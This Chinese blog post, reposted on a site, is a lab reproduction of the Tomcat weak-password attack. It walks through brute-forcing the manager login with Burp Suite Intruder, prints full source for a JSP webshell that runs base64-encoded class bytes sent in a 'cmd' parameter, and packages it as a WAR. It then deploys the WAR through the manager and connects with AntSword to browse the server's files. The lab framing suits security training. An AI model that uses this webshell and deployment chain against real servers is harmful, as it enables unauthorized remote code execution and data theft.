漏洞复现 - - -Tomcat弱口令漏洞

这篇具有很好参考价值的文章主要介绍了漏洞复现 - - -Tomcat弱口令漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一,简介

二,Tomcat弱口令

1 tomcat发现

 2 使用bp抓取登录包

 3 Burpsuite爆破

1.将抓到的包发送到爆破模块,快捷键ctrl+i

 2,选用自定义迭代器

 3,开始爆破

三, 后台Getshell

 1,准备一个jsp木马

2,制作一个war包

 3,部署war包到Tomcat Web应用程序管理者


一,简介

Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。 Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。

二,Tomcat弱口令

1 tomcat发现

漏洞复现 - - -Tomcat弱口令漏洞

 2 使用bp抓取登录包

漏洞复现 - - -Tomcat弱口令漏洞

 发现账户密码都是base64加密漏洞复现 - - -Tomcat弱口令漏洞

解密发现是admin:admin漏洞复现 - - -Tomcat弱口令漏洞

 3 Burpsuite爆破

1.将抓到的包发送到爆破模块,快捷键ctrl+i

漏洞复现 - - -Tomcat弱口令漏洞

简单介绍一下爆破模块

右侧功能

add             添加标记
Clear          清除标记
auto          自动在等于号后面添加标记
refresh       刷新

attack type:攻击类型  

1. sniper :每个个字典对应每个参数值
2. battering ram :不管选择爆破多少个参数值都是使用同一个字典
3. pitchfork :是字典一对应参数值一,字典二对应参数值二,爆破的次数取决于字典的大小
4. cluster bomb :交叉爆破(顾名思义,交叉爆破产生的字典非常庞大)

 2,选用自定义迭代器

在position选择表1,输入用户名字典

漏洞复现 - - -Tomcat弱口令漏洞

 payload type选项简介

Simple list :简单字典
Runtim file :运行文件
Custom iterator :自定义迭代器
Character sub :字符串替换

 在2输入:

漏洞复现 - - -Tomcat弱口令漏洞

 在3输入密码字典

漏洞复现 - - -Tomcat弱口令漏洞

在 payload processing添加base64编码格式

漏洞复现 - - -Tomcat弱口令漏洞

 Burpsuite会自动将符号进行 url 编码,这里需要将 Payload Encoding 的勾给去掉

漏洞复现 - - -Tomcat弱口令漏洞

 3,开始爆破

Start attack 进行爆破得到用户密码
看到回显200说明登录成功,对用户名密码进行解码
漏洞复现 - - -Tomcat弱口令漏洞

 漏洞复现 - - -Tomcat弱口令漏洞

 登陆成功

漏洞复现 - - -Tomcat弱口令漏洞

三, 后台Getshell

登录到后台后可以通过部署 war 包进行 getshell

war 包是 Sun 提出的一种 web 应用程序格式。它与 jar 类似,是很多文件的压缩包。war 包中的文件按照一定目录结构来组织。

一般其根目录下包含有 html 和 jsp 文件,或者包含有这两种文件的目录,另外还有 WEB-INF 目录。通常在 WEB-INF 目录下含有一个 web.xml 文件和一个 classes 目录。web.xml 是这个应用的配置文件,而 classes 目录下则包含编译好的 servlet 类和 jsp,或者 servlet 所依赖的其他类(如 JavaBean)。通常这些所依赖的类也可以打包成 jar 包放在 WEB-INF 下的 lib 目录下。

 1,准备一个jsp木马

<%!
      class U extends ClassLoader {
		  U(ClassLoader c){
			  super(c);
		  }
		  public Class g(byte[] b){
			  return super.defineClass(b,0,b.length);
		  }
	  }
	 public byte[] base64Decode(String str) throws Exception{
		 try{
			 Class clazz =Class.forName("sun.misc.BASE64Decoder");
			 return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
		 }catch (Exception e){
			 Class clazz =Class.forName("java.util.Base64");
			 Object decoder =clazz.getMethod("getDecoder").invoke(null);
			 return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
		 }
	 }
%>
<% 
       String cls =request.getParameter("cmd");
       if(cls != null){
         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
 }
%>

2,制作一个war包

jar cvf tomcat.war tomcat.jsp

漏洞复现 - - -Tomcat弱口令漏洞

漏洞复现 - - -Tomcat弱口令漏洞

 3,部署war包到Tomcat Web应用程序管理者

如图所示

漏洞复现 - - -Tomcat弱口令漏洞

 应用列表已经出现上传的war包漏洞复现 - - -Tomcat弱口令漏洞

 访问一个jsp文件

http://127.0.0.1:8080/tomcat/tomcat.jsp

如图所示说明部署成功 

漏洞复现 - - -Tomcat弱口令漏洞

 通过中国蚁剑添加数据,输入jsp木马中的密码cmd

漏洞复现 - - -Tomcat弱口令漏洞

 链接成功漏洞复现 - - -Tomcat弱口令漏洞

 访问查看到了本机的所有文件

漏洞复现 - - -Tomcat弱口令漏洞

  tomcat靶场部署完成文章来源地址https://www.toymoban.com/news/detail-472877.html

到了这里,关于漏洞复现 - - -Tomcat弱口令漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • yxcms弱口令至getshell 漏洞复现

    (1)yxcms yxcms 基于 PHP+MySQL 开发,这是一个采用轻量级 MVC 设计模式的网站管理系统。轻量级 MVC 设计模型使网站系统更加紧凑,且支持自定义表功能,使整个网站的数据结构设计更为灵活,也可以支持将图集、文章拓展成为其他实例,比如展品、分类等栏目。 本靶场中将使

    2024年02月11日
    浏览(48)
  • NPS(cnlh)内网穿透弱口令与登录爆破漏洞复现-内附自动化脚本

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 复现 4.2 POCsuite POC

    2024年02月10日
    浏览(41)
  • Nginx漏洞修复之目录穿越(目录遍历)漏洞复现及修复

    前言 Nginx是一个高性能的HTTP和反向代理服务器,经常被做为反向代理,动态的部分被proxy_pass传递给后端端口,而静态文件需要Nginx来处理。 漏洞出现在服务器的静态文件中。如果静态文件存储在/home/目录下,而该目录在url中名字为files,那么就需要用alias设置目录的别名 。

    2024年02月04日
    浏览(43)
  • Apache Tomcat 漏洞复现

    链接地址:Vulhub - Docker-Compose file for vulnerability environment 1.1 漏洞描述 说明 内容 漏洞编号 漏洞名称 Tomcat7+ Weak Password Backend Getshell Vulnerability 漏洞评级 高危 影响范围 8.0 漏洞描述 Tomcat 支持通过后端部署 war 文件,所以我们可以直接将 webshell 放入 Web 目录下。为了访问后端,需

    2024年02月09日
    浏览(47)
  • Apache Tomcat漏洞复现

    来到vulhub/tomcat/tomcat8/靶场 安装环境并启动: 修改端口后启动: 打开环境:

    2024年02月09日
    浏览(37)
  • tomcat中间件漏洞复现

    Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性

    2024年02月10日
    浏览(52)
  • 【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的

    2024年02月08日
    浏览(54)
  • 【精选】中间件 tomcat漏洞复现

    目录 1、tomcat后台弱口令漏洞利用 利用冰蝎连接: 2、tomcat远程代码执行漏洞 利用冰蝎子连接: 利用冰蝎连接: 靶场: 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子连接:

    2024年01月21日
    浏览(53)
  • 【漏洞复现】Tomcat 任意写入文件漏洞(CVE-2017-12615)

    Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞, 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件 ,文件中的代码被服务器执行。 Apache Tomcat =7.0.0,=7.0.79 漏洞的Tomcat运行在Windows/Linux主

    2024年02月13日
    浏览(49)
  • Nginx/OpenResty目录穿越漏洞复现

    2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞。 Nginx 是异步框架的网页服务器,也可以用作反向代理、负载平衡器和HTTP缓存。 OpenResty是一个基于nginx的Web平台,它对nginx增加LuaJIT引擎使其

    2023年04月10日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包